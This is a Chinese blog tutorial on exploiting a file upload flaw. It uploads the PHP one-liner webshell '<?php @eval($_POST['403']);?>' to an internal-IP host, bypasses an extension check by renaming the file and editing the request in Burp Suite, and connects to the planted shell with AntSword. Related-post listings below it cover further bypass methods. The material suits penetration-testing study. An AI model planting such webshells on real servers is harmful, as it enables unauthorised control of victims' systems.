文件上传漏洞挖掘实战

最新推荐文章于 2024-02-16 18:37:28 发布
最新推荐文章于 2024-02-16 18:37:28 发布
阅读量307 收藏 2
点赞数
分类专栏: 信息安全 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_70434663/article/details/129314319
版权

首先打开火狐浏览器,访问上传点(http://10.225.91.12/

在上传点中首先注册,登录后点击“个人资料”

 在“上传新头像”首先上传PHP一句话,但是会报错。因为只能上传jpg格式,所以只需把php的后缀名改为jpg就可以了。PHP一句话木马(这里要记住密码:403)为:

<?php @eval($_POST['403']);?>

改了后缀名后,在打开burp suite抓取数据包

 抓取数据包后把403.jpg改为403.php,然后放包,放包后得到如下界面

 证明此时操作是正确的,然后返回,右键点击查看图像可以得到图像的路径。

 将图像路径复制下来,打开蚁剑,右键添加数据

http://10.225.91.12/data/upload/face_pic/16778373019.php

 然后按照下图步骤,测试连接,添加数据。

 最后可以看到一句话上传成功 。

爱学习的葡萄萄
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SRC漏洞挖掘实战经验总结
10-28
最近几年总结收集的SRC漏洞挖掘实战经验,希望对你有帮助。
挖漏洞之文件上传
weixin_49349476的博客
12-10 248
文件上传漏洞的方法总结,和一些经验
渗透测试之文件上传
weixin_52177486的博客
02-16 565
用户上了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力(上web脚本能够被服务器解析)通常存在于网页主界面(个人资料,提交文档)、后台登录系统以及许多未关闭的接口。在实战环境中,我们不能看到服务器上的计算器是否正常开启,所以使用可以看到回显的命令,从而确保正常执行,在当前目录下写一个2.txt文件,里面存入内容123123123.4、寻找脚本上之后的路径,看是否可以访问到(如果看到空白的页面说明脚本被解析了、如果没有解析脚本会以文本的方式出现在网页上)。
任意文件上传漏洞挖掘(getshell)
huangyongkang666的博客
11-27 244
SRC任意文件上传漏洞挖掘(getshell)
手动漏洞挖掘(三) 文件上传
weixin_30337251的博客
07-08 182
还是以Metasploitable中的DWVA为例 我们上一张照片后: 但是这里却显示了文件的路径,我们试猜想,如果上的不是一个图片,而是一个php文件,而且文件中包含一句话木马,会不会有不同的效果 为了验证,这里我编写了一个简单的一句话木马1.php文件 功能很简单打开cmd命令,将cmd命令的结果echo到页面中 同样这里上成功: 可以在输入框...
文件上传漏洞的原理和利用(详细)
永不落的梦想
07-05 1706
本文包含文件上传漏洞的原理、利用和防御,绕过文件上传限制的各种姿势可以有效地利用文件上传漏洞,非常全面详细
文件上传漏洞
金色%夕阳的博客
04-29 2068
文件上传漏洞 1. 文件上传功能 文件上传功能是大部分WEB应用的必备功能,站点常见文件上传点有:用户头像上、社交类网站允许用户上照片、服务类网站需要用户上证明材料的电子档、电商类网站允许用户上图片展示商品情况等。然而,看似普通的文件上传功能如果缺法安全防护措施,就存在巨大的安全风险。 2. 文件上传漏洞 文件上传漏洞是指攻击者上了一个可执行的文件到服务器并执行。这里上文件可以是木马,病毒,恶意脚本或者WebShell等。通常是因web应用程序没有对上文件进行安全判断或者判断条件不够严谨,
Web安全—文件上传(解析)漏洞
zhdf160916的博客
11-21 5080
教学目标 理解文件上传漏洞原理 掌握几种文件上传绕过方法 一、文件上传漏洞介绍 文件上传文件上传是现代互联网常见的功能,允许用户上图片、视频、及其他类型文件,向用户提供的功能越多,web受攻击的风险就越大。 1、文件上传漏洞 上文件时,如果未对上文件进行严格的验证和过滤,就容易造成文件上传漏洞,上脚本文件(asp、aspx、php、jsp等) 注:asp,aspx对应iis解析 php对应apache解析 jsp对应java(tomcat) 恶意上行为可能导致网站甚至整个服务器被控制。恶
文件上传漏洞的思维导图
04-19
总结了文件上传漏洞的相关知识
文件上传漏洞常见绕过方法
05-26
1、前端js检测文件格式 2、上文件时加入了“Content-Type”验证 3、文件后缀验证 4、文件后缀黑名单 5、文件头验证 6、文件内容初级验证 7、文件上传+文件包含
文件上传漏洞原理.md
05-07
适合刚入门web安全的小白
【推荐】网络安全中的漏洞挖掘实践合集.zip
09-03
推荐,网络安全中的漏洞挖掘实践合集,仅供大家学习参阅,包含内容如下: 针对现实应用的文本对抗攻击研究 安全众测下的漏洞发展新趋势 安卓应用漏洞挖掘 从0到1-发现与拓展攻击面 对基于Git的版本控制...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8198
随着近几天国家网络安全周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
智慧学院智能化项目规划设计方案PPT(45页).pptx
05-03
智慧学院智能化项目规划设计方案PPT(45页).pptx
AO工艺设计计算(全).xls
05-03
污水处理计算书
ASP+ACCESS动态网站设计与制作(源代码+设计说明书).zip
05-03
ASP+ACCESS动态网站设计与制作(源代码+设计说明书).zip
基于matlab实现的二维渗流代码,用于模拟在二维条件下,格点所受碰撞的次数.rar
最新发布
05-03
基于matlab实现的二维渗流代码,用于模拟在二维条件下,格点所受碰撞的次数.rar
pikachu靶场的文件上传漏洞挖掘怎么防御
04-03
文件上传漏洞是一种常见的安全漏洞,攻击者可以通过上恶意文件来执行任意代码或者敏感信息。为了防御文件上传漏洞,可以采取以下措施: 1. 验证文件类型和文件名:在后端对上文件进行验证,确保文件类型和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值